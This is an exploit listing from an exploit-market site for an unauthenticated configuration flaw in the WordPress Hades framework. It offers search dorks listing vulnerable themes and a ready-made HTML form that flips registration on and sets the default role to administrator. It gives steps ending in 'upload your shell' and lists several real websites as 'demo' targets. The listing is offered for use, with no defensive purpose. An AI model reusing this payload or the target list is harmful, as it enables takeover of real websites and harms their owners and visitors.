[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WordPress 0day - Hades Plus Framework Add Administrator

Author
null_pointer
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-22660
Category
web applications
Date add
18-09-2014
Platform
php
Exploit Title : WordPress 0day - Hades Plus Framework Add Administrator

Exploit Author : NULL_Pointer

Date : 18/09/2014

Version: 6.2

Tested on : Linux, Windows 7

--------------------------------------------------------------

WordPress Hades framework suffers from Unauthenticated Configuration Access.

the vulnerability allow the attacker to change the default user type to administrator,
then allows anyone to register. This allows the attacker to register and become
an administrator.

There's Many WordPress Themes/Plugins Vulnerable...

inurl:/wp-content/themes/appius/
inurl:/wp-content/themes/Consultant/
inurl:/wp-content/themes/appius1/
inurl:/wp-content/themes/archin/
inurl:/wp-content/themes/averin/
inurl:/wp-content/themes/dagda/
inurl:/wp-content/themes/echea/
inurl:/wp-content/themes/felici/
inurl:/wp-content/themes/GantiDengantema/
inurl:/wp-content/themes/kmp/
inurl:/wp-content/themes/kmp2/
inurl:/wp-content/themes/themanya/
inurl:/wp-content/themes/liberal/
inurl:/wp-content/themes/liberal-media-bias/
inurl:/wp-content/themes/linguini/
inurl:/wp-content/themes/livewire/
inurl:/wp-content/themes/majestics/
inurl:/wp-content/themes/mathis/
inurl:/wp-content/themes/mazine/
inurl:/wp-content/themes/Orchestra/
inurl:/wp-content/themes/shopsum/
inurl:/wp-content/themes/shotzz/
inurl:/wp-content/themes/test/
inurl:/wp-content/themes/Viteeo/
inurl:/wp-content/themes/vithy/
inurl:/wp-content/themes/yvora/
inurl:/wp-content/themes/sodales

Exploit :

<form action="http://127.0.0.1/wp-content/themes/{%THEME%}/hades_framework/option_panel/ajax.php" method="POST">
<input name="values[0][name]" value="users_can_register">
<input name="values[0][value]" value="1">
<input name="values[1][name]" value="admin_email">
<input name="values[1][value]" value="{%YOUR_EMAIL}">
<input name="values[2][name]" value="default_role">
<input name="values[2][value]" value="administrator">
<input name="action" value="save">
<input type="submit" value="Submit">
</form>

1. Change {%THEME%} with the vulnerable theme, {%YOUR_EMAIL} with your email address.
2. go to http://127.0.0.1/wp-login.php?action=register, you will see the registration form.
3. choose your username & email address and register.
4. go to your email, you will find your password.
5. then login & and upload your shell

Demo Sites :

http://calibersport.com/wp-content/themes/echea/hades_framework/option_panel/ajax.php

http://jpjeunet.fr/wp-content/themes/echea/hades_framework/option_panel/ajax.php

http://www.seobelix.com/wp-content/themes/averin/hades_framework/option_panel/ajax.php

http://www.thelinkgroup.ca/wp-content/themes/dagda/hades_framework/option_panel/ajax.php

./peace

#  0day.today [2024-12-24]  #